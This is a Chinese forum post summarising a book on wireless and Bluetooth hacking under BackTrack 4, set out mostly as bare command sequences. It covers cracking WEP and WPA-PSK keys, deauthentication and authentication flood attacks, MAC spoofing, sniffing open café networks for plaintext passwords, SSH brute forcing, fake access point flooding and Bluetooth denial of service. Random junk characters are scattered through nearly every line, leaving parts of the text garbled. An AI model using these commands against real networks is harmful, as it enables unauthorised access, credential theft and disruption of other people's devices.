少校
- 注册时间
- 2008-11-14
- 金币
- 2275 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
( |; f( W1 r) o; U% Z
2 K6 B( g. R7 w) R2 J以下所有操作均在BackTrack 4中进行。
4 \9 S2 g* v0 ?, s3 p: {( E6 e% B
( a- `) p5 Q8 ]' V, T4 O0 j
. N/ S6 n% q0 \- s+ b+ W- {, F无线WEP加密P解:. u- B4 l) N6 r5 K
) B7 j% a% G( {$ t8 I3 x- [3 B5 |8 {
注入P解:) d; ~* S0 T* o
6 U7 y& E7 B% V8 |3 fifconfig% U# ]6 _: `' N+ D0 k: S
. | i) ~: F6 [" C l
ifconfig –a" P+ N- Y' Y8 f$ B! [
2 n# {, p: `' ?+ b. a0 iifconfig wlan0(无线网卡) up. t' F2 A- r- u$ t8 i8 K/ [6 u0 C
1 ~! ^7 _+ A; v2 k! g/ ~. U8 h- fairmon-ng start wlan0
5 U( ?) `0 X7 `: `7 u7 \+ I2 z: Y/ i5 u! h3 R7 R
airodump-ng mon0
+ B* N. o) H1 E9 Y1 j
3 ~8 W+ S- i1 Zairodump-ng --ivs –w ivsfile –c 频道 mon0或3 L# q X4 s9 F/ O/ @, ^* g3 S
& N5 ]8 R( }% ^/ R# X
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
+ z% S5 ]$ D4 \9 ]+ j- x, K5 T" H5 D; \
aireplay-ng -3 –b BSSID –h Station mon04 W( v" `$ N9 T% a& U' c J
5 ~/ o$ l9 @1 _: m6 N v: C
aircrack-ng ivsfile-01.ivs
% A/ w. l8 y8 \( b* c( ^# y6 ]8 |4 \# Z# i+ E
虚连接P解(适用于无客户端连接APP解)
( `$ ^$ u2 ^$ U, a, {9 i# P: c0 v) D# F& d* B/ F
ifconfig
4 ` c; }$ ^9 @/ ^6 t& ]" k# ]' ?0 o. L3 p
ifconfig –a" P% E6 s1 i# T( I* P8 ?3 p. V. `! x
, Z0 I' c. q% ~% lifconfig wlan0(无线网卡) up5 X& M9 I' k8 A9 A' Q" P
- |8 E% ?! H# ]$ z, |+ `: |airmon-ng start wlan0; W9 |1 Z% S; L8 y& ]9 y
" Y/ }: d5 N: Wairodump-ng mon0
) L9 W! y' \2 f* I
2 l$ N$ m3 ? \8 S, Yairodump-ng --ivs –w ivsfile –c 频道 mon0或
+ F( H0 V6 t. p0 L! P* n! M: ?# G1 F- p4 G! H& P) @, F
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
4 Y- a( X+ A* B# K% I: q9 H
8 z+ Y) ~) w/ d3 ^aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
' I) R+ a! o/ W7 l* u) u4 @% B, @8 L7 r6 H8 \* {
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon07 @4 j0 a5 m2 E' |% P
7 Q* j% X+ U! d+ O, r4 A! b
aircrack-ng ivsfile-01.ivs
5 B: F) d i) {/ a4 r! f% J( a/ G% K& \4 y1 L: }
C% I/ C( ]7 ~) [0 V. i% N( @
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。" [6 }6 M( O ?* @1 k
. W0 Q; l& x" n7 a' Y( B
) j! z, v% m) n& o" R4 g& pWPA-PSKP解& a0 @& E4 Y \% S2 A
/ t9 p) H- o* l% j( I/ y
ifconfig
, F) |% v% J% L* B% r
y. t9 ~9 ?' l: V8 b0 |ifconfig –a
! d' l& ~7 r0 f) l, e
5 `5 x+ t+ J! D% d4 b2 Bifconfig wlan0(无线网卡) up0 w& b; {( S1 V
' a/ A/ J% n# |; cairmon-ng start wlan08 u6 \! H# K* `0 O
& Q" \& \0 l) Xairodump-ng mon0
- P' ~* G2 C, E2 ?3 ]9 y5 b8 ^/ |& ` e" k j0 ]
airodump-ng –w capfile –c 频道 mon0
J ]& W- E/ u7 r1 A9 S) h8 ]; D: z3 G$ o! v5 ~# @- v' |
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
( T, N! ^9 B6 L+ g
- u2 s- k; z' f) W! {aircrack-ng –w Dic capfile-01.cap或& ?* p3 r$ ]; B% e
+ l) ~- V/ Y2 Dcowpatty –f Dic –r capfile-01.cap –s SSID: N! Y# f' \% N; @% @# f
1 \1 n5 T% ]* }7 L& F2 C* Pcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
; l' w6 r% ^7 Y: b$ v7 y4 J1 a' Z5 N- a" D- U b6 z G) b+ T9 c9 R0 B
傻瓜式P解软件SpoonWPA。
+ g% I/ D' F4 K9 S9 ^1 \; B; c( H0 W
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst# Z3 I" }: x8 D7 s: ]
2 e' f) g' v% b$ a- F
8 @+ } ]! {9 E9 X字典文件的生成和上传
' l* o' l7 k- o8 }/ U2 r
. ?* O: ?* P% f在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。' p Q0 V* ?, W+ w0 R
8 w8 z. {* q4 Z% Z) G( R. }6 k. X3 `$ V0 o' t
BT4下开启Tftp:Services—TFTPD—start TFTPD
! M' k: J5 L4 J. \: Q) W/ C4 o& Y1 e' c+ s/ U
在Windows的CMD中运行 tftp –i IP put **.dic
" Y) W) y2 C: y- n# L4 m
7 r3 y4 W" ^: {! M8 P1 Y. G* f( i3 C0 T: X, v$ n8 ~- Y# i
BT4下开启SSH:Services—SSH—start SSH
7 M s- _) O! L' ~7 M s
. M; t' [$ U+ T3 x* V# yWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root: p/ W2 a" P9 n( U) A* a! D3 J3 o
# E6 H2 v+ \% Y: E$ v# e
/ }! K3 C' N+ ^( d
AP限制MAC时的解决
. I/ U9 W8 L8 Z$ {, |& X5 H$ J8 d9 J' n. B0 _2 |$ Q/ x+ _
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:+ C; k& c4 F$ j( \, L. ]- q# d% x
" g' L/ O% H# g s% b6 o: m
ifconfig wlan0 hw ether NewMAC
3 U/ G4 t' z, R! P4 k: h, I/ \- {2 M/ C+ A+ ?2 B# v( s
/ F$ v7 u3 x' C9 c
关闭SSID广播的AP探测:* S6 K8 v% a) B3 F
4 w* s% c1 C8 }1. Deauth攻击:
/ d! a! H* M1 d ?; [# Y+ P
9 y0 J5 i4 ?5 f" B- sairodump-ng mon0
3 o3 I) z2 h6 N7 V: s4 c$ d
8 i" l8 ~# u6 u% C) w( R5 saireplay-ng -0 10 –a BSSID –h Station mon0# U+ q0 e; |- ?7 O) {* D6 K3 F2 P, u
1 K& }7 {: T7 }. g
2. 抓包分析
# U7 g( R+ [& S
/ s6 p; B& f0 N7 [Omnipeek
# B- |+ d( V* D0 Q% O
2 l) |* K2 o$ X& }3 uTcpdump –n –e –vvv –i 网卡名
1 o, [! k E1 Z. ^
1 N0 J6 B" n+ ]4 G0 \! N, e3. 暴力P解
9 g" y; O) `+ p# k. a3 A$ C0 A7 S) X# ?0 T) ?# E
Charon 1.1暴力P解
m G6 d- R3 V0 [
' z" J+ v# Y" s. Z I- Y7 |& q( X7 O- S. d' Q
无线加密数据包的解密
$ }0 a/ h% v, P9 d& k, D
- F% z4 }7 v+ f) m: G# N* f5 q7 a. \ g2 v; i7 u/ {' d( X: h0 e
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
" E# t8 e9 B: ^8 }' w# g0 |
4 u) e* L. C5 o* F$ @" X& yFilterNS DNS解析数据包
. F8 C) V4 b- K1 h: v8 r/ f7 M( z# W' b
Filter:HTTP WEB访问数据包- l) X( s- W `$ b; f- Y' g
' n2 F3 O6 M+ S% SFilter:msnms MSN
/ \3 ^5 K7 c+ F& l" G/ m! F* M8 R1 q: A, ?) q* u
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。: }6 T* F& N/ d7 n2 n% \. a8 Y" g
" [$ A8 x; J& O# k- ^
使用airdecap-ng解密:+ b, v& h- d' z
$ F# c! \2 e) [3 D6 q: d6 JAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap Y9 t2 b t8 Z
5 ~- v- I+ }9 J! m5 L) b5 G9 v# S
* e2 A- N/ y O: A- f9 H- h D! ?咖啡馆中无线数据截取(开放式无加密AP)" p7 H3 L% P7 E; t! \! c
6 G- C$ O- B7 X. ^4 |1 k2 Q! ^
1.Airodump-ng –w data –c频道 mon0
7 s8 R8 }2 `( W" }! r0 v4 R0 l- f$ A& j6 x2 }3 k& _/ k6 S
2.使用WireShark打开分析
3 J4 W( @( B$ [# T2 q& \6 _3 w0 J0 P
# D+ m5 f4 ~; \; b3 g) sBT4下的渗透工具:
- V7 S; d$ V; g6 {
u' d' ~2 `7 o2 y7 Fnmap –sP IP/24 判断C段下存活的主机 : M) G" d+ U' {3 k, G
: l! b! W2 y. r: d$ e+ Tnmap –vv –sS IP/24 –p Port 扫描指定端口是否开放
# }0 J: e# f8 J% }4 H- m/ \* I9 L# M
nmap –vv –sV IP –p port 指定端口的详细信息。。。; b2 N8 `! P# E1 V5 j$ Z# |
! ]( c; t& j& H. }namp –O IP/24 判断主机的系统版本
. E( c' p9 {. [/ H, z- Z2 C; h ?" a c( P2 ?, R4 T6 c, B
) S) h2 m7 G$ FGUI 版nmap:Zenmap ( u! P+ V$ O2 Z {8 R
! t9 C7 O# d" q- x0 [! r
# e, B2 e1 p% Q( k& DAmap使用:amap –B IP port
6 k& R" X% J) z+ ~, U% j+ n% S. |
Nbtscan(扫描Windows网络NetBios信息):
# F* V: E- k- P W r) W
0 f3 T) k9 h2 J3 ?: |/ g1 jnbtscan –v –s : IP/24" Z; r; }3 ?3 h1 N" G- H
& J) _% @1 v7 `2 L# N
nbtscan –r IP
1 Y9 l- |# @$ H- s
7 r* j4 I: q( J9 k9 V& p2 G q+ r- \$ O8 e+ B' q2 m$ V
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
$ X2 ^; }+ d% {9 n- u, A
# t! n9 ]# {7 p+ r1 {& w1 O8 M( N# ^3 J. V- L7 N
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
9 s x+ [: A. P- O% E4 ]$ E! g! ]/ Y' A+ M8 \
BruteSSH: ./bruthe.py –h IP –u Username –d Dic4 W! i& C7 w1 x( k! K0 u
# |& V" F7 [+ K1 l* A" r/ {
Metasploit3使用
5 i, g" z5 W" z无线D.0.S
. C- o/ `6 U1 A6 Q- m
- z8 T9 \3 L6 O+ W
7 h0 Q0 p# S/ @& ]Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
! _9 c" Y9 j1 J/ M- |! G% _/ [$ z8 o+ ~, C
airmon-ng start wlan0% L' V7 G+ Y5 p; ]( J" q5 M
# c( x# l* X }6 V4 b
airodump-ng mon01 H- z7 `% }8 q, M. p2 T
: z3 Q7 I7 C7 {3 y* ~* P
mdk3 mon0 a –a BSSID
; a i& Z+ G) F/ `7 M) z: M8 k0 O
对所有的AP攻击:mdk3 mon0 a
* E. a& x/ D& ^( Y _' _8 ^2 r$ v* [8 O6 \+ E
* x c' a7 u, a4 b0 Y+ eDeauth Flood 攻击; D) H( Z# D+ @9 ?0 G5 M7 @5 `- j
7 B% D5 y3 [8 b) U* V
mdk3 mon0 d –c Channel9 E/ T% f* a( f2 e/ R1 d
- u0 ?7 t# B$ z+ K) a9 }* q; A
图形化D.O.S攻击:Charon" j% |" e9 ]" C( L, n8 z( I
* y- G2 L6 n/ u+ b) n9 z
0 U- y4 G+ f% J- e4 c当受到攻击时,使用Wireshark抓包可以看到异常信息。
* g4 R" Y3 G0 N& u( b/ z" b6 e; x- `* o; h/ @+ I2 {
3 R' ~1 F9 G$ q* uWPA-PSK高速P解
* A1 L4 g; j3 `% M. @
6 m& i2 _2 x3 j0 Y+ U1. WPA-PSK PMK Hash TablesP解
+ X0 I* T$ o9 T# m: b3 } K( |8 v( I! @# k# D( e- D
Cowpatty –d HashTable.hash –r ***.cap –s SSID# P, k6 ?0 o& q. d9 W& q
) b0 P6 @0 A5 O3 r9 ^0 s- `5 p. {
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
8 y, [6 B$ m0 Q# K$ X/ _- M m
" L7 k R! i0 [" x# D5 ^3 R$ }/ Q2. GPU辅助高速P解
+ |0 b6 D# F) K- c+ u, g& a; |3 f: M% C3 I% R- D' z& n) S0 t
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。" [9 q% ?, o8 Y' |& m0 Y5 l
: \3 T7 R' K% v: T; @; g2 u: t3. 分布式P解
( E4 L a: x! {1 c) g9 h8 T1 W
# m1 T( p% {5 z9 [; f- p% z y( N/ E z; b" ^% o3 v( t
AP的伪造
% w" b0 Y/ ?) V8 O0 R }- W/ v. j! Y4 Q$ p
把AP的MAC改成目标AP的MAC
) Z2 F( V/ x; f, ?- `; {. |1 v3 ~. Q1 @
网卡软AP9 Y( ~! B5 G m% f; B
/ v1 h& n( O. H ?: K% `( B$ Z _! ~/ w: M$ B) b: H3 k
伪造大量虚假AP信号:* s* E1 x3 ], a" w1 x
- t, M8 _- C1 ]$ c7 l: ?
随机SSID:mdk3 mon0 b –g –c 频道 3 i* B8 Q0 H& e% f/ e
/ ? T% p/ e; A( f% L指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度/ y9 d% U4 S2 I. W. [! e
% y5 D9 J, {6 e
9 w- z" y( i- A5 d7 d; G) EWar-Driving
, h \; t! q; a0 A K+ u
/ P; d" W" i4 X8 @热点地图绘制
. a F- H) P( y! X; s0 r6 q
& w: c" A9 q& hWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。' Z8 R8 z. O- l l% t* v( F0 K
( c% g+ P) _5 D2 _ c2 [
: j F a% {. V/ o! e
Netstumble" O9 U8 ? u- Q0 P
, v4 D: t7 y( f0 h/ i+ q) ^, s1 ?9 y2 L- r3 o9 G7 }7 H: a
蓝牙Hacking& `3 Y, ~: _' p* z8 E
, \/ Z- {9 u' EWindows下的Blue Soleil工具4 J$ z9 b7 ~) z1 c
6 t _/ U# \* x/ z! S r9 w
BT4:' K; q3 w8 X* X4 g- ^
" w3 C; w0 T/ y/ d
hciconfig 查看蓝牙适配器4 m6 S" o' j4 B0 `1 X) w
+ | y" Q# a1 u! f3 X* e) e
hciconfig hci0 up 载入蓝牙适配器
! B2 d( K- c; x b# C0 ~0 U/ x3 V7 Y4 {4 ]# V' X
hciconfig hci0 class 蓝牙适配器详细信息( ?1 O( r2 K9 f6 X( D# r
8 M7 n( O8 y! b
* R* Q2 i) z* z1 ]hcitool(扫描蓝牙)7 {4 o# E3 P$ c ]2 H
4 P3 W4 P% q6 Y/ t
hcitool –i hci0 scan9 N/ S4 x% I( J- T
$ G3 v @. w- R5 w' @$ I" a9 \BTscanner(扫描蓝牙)9 C7 i* c; t. D
- D4 m+ s& j2 ^1 e2 }) j% a3 i# h1 G( x* w( |7 J1 R
蓝牙攻击:: X# B( |" `3 I9 H0 H0 v& J9 P+ ]
2 {. l u. M5 G }* z" tBlueBugging (适用于BlueTooth V1.1的手机)
& R; I6 C. n X* J" u' m. Y, x4 [; Q. p
Bluebugger工具:* H3 ?! X: @+ r
+ i% [% B: t. d7 P0 b9 z( l
Bulebugger –a HD_Addr info$ L4 o5 t3 m. V9 p* l. J
S; X4 z: A) j& c# F2 |: `2 ]
* |) h! J6 ?$ g! P! _- V
BlueJacking; L9 e5 g1 u: S% ] M. v& Q
* n7 a- f" U* Y& n实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
$ D' F3 g/ s7 ~. n4 i
. t& R% r3 y; a; a
# F& ?+ s; _0 S3 A) OHD_Addr修改: A2 |0 {( M6 F- y' @
+ ~1 f/ ?0 y9 s+ T% s5 x; A( z5 JBdaddr工具5 k! W; `, G2 T5 I6 Z+ b% t4 e. I$ C
9 S( J& s+ k. B7 z- I
bdaddr –i 蓝牙设备名 新HD_addr
) |1 @ v. L' v
" ?# @ Q0 N: Y; E. i1 a! @# m. P3 ]6 w% [1 Z% p1 o
蓝牙D.O.S8 g8 d0 J, V0 A# e+ f2 O }2 ]
7 H% e; u c) s1 }& k# r8 G! pl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
' G" M! a( c" L8 G+ R( K& P! W4 E0 Z; F/ t
hciconfig
g) P4 \5 j& }+ k$ r! P' o
& L9 S# r$ u. ~* }1 p4 ehciconfig hci0 up
. m' V. o2 e* G6 L$ T4 F# x: G/ Y2 `9 e: j5 H+ r0 i
hcitool –i hci0 scan& u/ i% s4 Y. x0 {
: k" |( j! ]2 e5 L1 z# m- X& Y) F0 X
l2ping –s 10000 –目标MAC' X6 h6 T. f" }. q
- r, n% _' v. @0 J5 a
+ l3 r1 y6 X( x+ e1 i. {
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件) ^7 D" y& y1 U+ D s; W9 Y
* r. ?# h' j1 d4 e) [; {: D! S* a
./fang –r ************-############ -s
8 k8 \9 C' d# Z9 i& _
; h7 Z! S( N! s5 d, }- y/ f z暴力P解************-############的蓝牙设备
: V. ^; W3 ?3 |
8 C) I4 s1 B1 |% I9 ^0 v./fang –l 各厂商BD_Addr分配, q8 N7 U+ f/ G! y7 s4 y+ Y
4 [! h4 d H/ ` i, T4 H/ \
$ H- n0 s/ H2 y' MWifiZoo使用$ j: D% I1 T( k
) U9 i0 S+ y3 t; u7 j9 _./wifizoo.py –c Capfile
( q# K$ Y% ~: t* i: J O3 D% H- u
* ^3 N2 ^ i% `( K6 Y访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|